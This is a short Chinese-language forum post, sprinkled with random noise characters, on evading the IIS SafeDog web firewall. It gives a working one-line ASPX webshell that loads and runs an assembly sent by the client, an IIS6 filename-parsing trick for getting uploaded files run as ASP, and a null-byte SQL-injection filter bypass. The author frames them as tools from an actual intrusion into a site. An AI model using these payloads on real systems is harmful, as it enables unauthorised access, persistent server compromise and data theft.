1、绕过IIS安全狗的一句话。
4 P* S% |; ?" m$ |% d0 P2 Y前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
" g7 C, p4 E2 U7 V/ f3 ?<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。) G) R: w; ]" S0 _; g b3 d
, ^2 u7 s2 e: d% v6 S; N
2、IIS6.0解析漏洞遇到安全狗。
% q l8 [7 y* r- ~: o3 E; m文件名为% q/ P1 @& Z+ l* j; K
http://www.xxxxx.com/sh3llc0de.asp;1.jpg" }$ p( `6 @% r
. f2 ]/ I4 ^9 N! W% W7 N这样的会被IIS安全狗果断屏蔽。( k7 U! Y( O& i, S: T
改成如下名称,IIS6一样会解析:
- f9 k! l. S5 G: s' D4 ]www.xxxxx.com/;1.asp;1.jpg
( S6 o0 d* ^5 V! F5 j4 `& d: P2 P3 C1 ]' O* m/ t" }
3、安全狗的注入绕过。
9 O0 \' |& y6 d# B |常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
y& r5 D6 Z" X+ d @' P% n& g: L但如果:( e8 q$ w8 s. b. s$ B
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
. X d& [4 u; D j' v就可以成功绕过了。
6 | L- E5 d; O2 x4 z
- R$ u6 ^* S" K9 J3 v& ^% _4 y: a4 Z4 s0 T$ E
|